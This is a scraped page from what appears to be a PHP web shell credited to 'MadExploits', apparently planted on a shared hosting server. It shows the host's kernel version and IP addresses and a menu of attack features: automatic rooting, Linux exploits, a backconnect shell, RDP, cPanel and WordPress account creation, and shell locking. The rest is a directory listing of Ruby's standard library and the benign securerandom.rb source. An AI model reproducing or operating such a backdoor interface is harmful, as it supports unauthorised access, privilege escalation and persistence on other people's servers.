Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby34 /
share /
ruby /
[ HOME SHELL ]
Name
Size
Permission
Action
bigdecimal
[ DIR ]
drwxr-xr-x
cgi
[ DIR ]
drwxr-xr-x
did_you_mean
[ DIR ]
drwxr-xr-x
digest
[ DIR ]
drwxr-xr-x
erb
[ DIR ]
drwxr-xr-x
error_highlight
[ DIR ]
drwxr-xr-x
fiddle
[ DIR ]
drwxr-xr-x
forwardable
[ DIR ]
drwxr-xr-x
io
[ DIR ]
drwxr-xr-x
json
[ DIR ]
drwxr-xr-x
logger
[ DIR ]
drwxr-xr-x
net
[ DIR ]
drwxr-xr-x
objspace
[ DIR ]
drwxr-xr-x
open3
[ DIR ]
drwxr-xr-x
openssl
[ DIR ]
drwxr-xr-x
optparse
[ DIR ]
drwxr-xr-x
prism
[ DIR ]
drwxr-xr-x
psych
[ DIR ]
drwxr-xr-x
random
[ DIR ]
drwxr-xr-x
reline
[ DIR ]
drwxr-xr-x
ripper
[ DIR ]
drwxr-xr-x
ruby_vm
[ DIR ]
drwxr-xr-x
set
[ DIR ]
drwxr-xr-x
strscan
[ DIR ]
drwxr-xr-x
syntax_suggest
[ DIR ]
drwxr-xr-x
unicode_normalize
[ DIR ]
drwxr-xr-x
uri
[ DIR ]
drwxr-xr-x
vendor_ruby
[ DIR ]
drwxr-xr-x
yaml
[ DIR ]
drwxr-xr-x
English.rb
5.54
KB
-rw-r--r--
benchmark.rb
18.66
KB
-rw-r--r--
bundled_gems.rb
7.28
KB
-rw-r--r--
cgi.rb
9.83
KB
-rw-r--r--
coverage.rb
368
B
-rw-r--r--
date.rb
1.17
KB
-rw-r--r--
delegate.rb
11.68
KB
-rw-r--r--
did_you_mean.rb
4.51
KB
-rw-r--r--
digest.rb
3.3
KB
-rw-r--r--
erb.rb
14.53
KB
-rw-r--r--
error_highlight.rb
84
B
-rw-r--r--
expect.rb
2.19
KB
-rw-r--r--
fiddle.rb
3.67
KB
-rw-r--r--
fileutils.rb
78.8
KB
-rw-r--r--
find.rb
2.52
KB
-rw-r--r--
forwardable.rb
9.03
KB
-rw-r--r--
ipaddr.rb
22.4
KB
-rw-r--r--
json.rb
19.58
KB
-rw-r--r--
logger.rb
22.49
KB
-rw-r--r--
mkmf.rb
92.63
KB
-rw-r--r--
monitor.rb
6.97
KB
-rw-r--r--
objspace.rb
4.14
KB
-rw-r--r--
open-uri.rb
28.38
KB
-rw-r--r--
open3.rb
47.51
KB
-rw-r--r--
openssl.rb
1.06
KB
-rw-r--r--
optionparser.rb
59
B
-rw-r--r--
optparse.rb
64.17
KB
-rw-r--r--
ostruct.rb
14.22
KB
-rw-r--r--
pathname.rb
17.2
KB
-rw-r--r--
pp.rb
18.36
KB
-rw-r--r--
prettyprint.rb
15.93
KB
-rw-r--r--
prism.rb
2.93
KB
-rw-r--r--
pstore.rb
20.36
KB
-rw-r--r--
psych.rb
25.1
KB
-rw-r--r--
readline.rb
215
B
-rw-r--r--
reline.rb
14.93
KB
-rw-r--r--
resolv.rb
87.96
KB
-rw-r--r--
ripper.rb
2.44
KB
-rw-r--r--
securerandom.rb
2.28
KB
-rw-r--r--
set.rb
25
KB
-rw-r--r--
shellwords.rb
7.53
KB
-rw-r--r--
singleton.rb
5.52
KB
-rw-r--r--
socket.rb
59.49
KB
-rw-r--r--
syntax_suggest.rb
74
B
-rw-r--r--
tempfile.rb
20.68
KB
-rw-r--r--
time.rb
23.96
KB
-rw-r--r--
timeout.rb
5.72
KB
-rw-r--r--
tmpdir.rb
5.62
KB
-rw-r--r--
tsort.rb
14.29
KB
-rw-r--r--
un.rb
11.17
KB
-rw-r--r--
uri.rb
3.09
KB
-rw-r--r--
weakref.rb
1.36
KB
-rw-r--r--
yaml.rb
2.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : securerandom.rb
# -*- coding: us-ascii -*- # frozen_string_literal: true require 'random/formatter' # == Secure random number generator interface. # # This library is an interface to secure random number generators which are # suitable for generating session keys in HTTP cookies, etc. # # You can use this library in your application by requiring it: # # require 'securerandom' # # It supports the following secure random number generators: # # * openssl # * /dev/urandom # * Win32 # # SecureRandom is extended by the Random::Formatter module which # defines the following methods: # # * alphanumeric # * base64 # * choose # * gen_random # * hex # * rand # * random_bytes # * random_number # * urlsafe_base64 # * uuid # # These methods are usable as class methods of SecureRandom such as # +SecureRandom.hex+. # # If a secure random number generator is not available, # +NotImplementedError+ is raised. module SecureRandom # The version VERSION = "0.4.1" class << self # Returns a random binary string containing +size+ bytes. # # See Random.bytes def bytes(n) return gen_random(n) end # Compatibility methods for Ruby 3.2, we can remove this after dropping to support Ruby 3.2 def alphanumeric(n = nil, chars: ALPHANUMERIC) n = 16 if n.nil? choose(chars, n) end if RUBY_VERSION < '3.3' private # :stopdoc: # Implementation using OpenSSL def gen_random_openssl(n) return OpenSSL::Random.random_bytes(n) end # Implementation using system random device def gen_random_urandom(n) ret = Random.urandom(n) unless ret raise NotImplementedError, "No random device" end unless ret.length == n raise NotImplementedError, "Unexpected partial read from random device: only #{ret.length} for #{n} bytes" end ret end begin # Check if Random.urandom is available Random.urandom(1) alias gen_random gen_random_urandom rescue RuntimeError begin require 'openssl' rescue NoMethodError raise NotImplementedError, "No random device" else alias gen_random gen_random_openssl end end # :startdoc: # Generate random data bytes for Random::Formatter public :gen_random end end SecureRandom.extend(Random::Formatter)
Close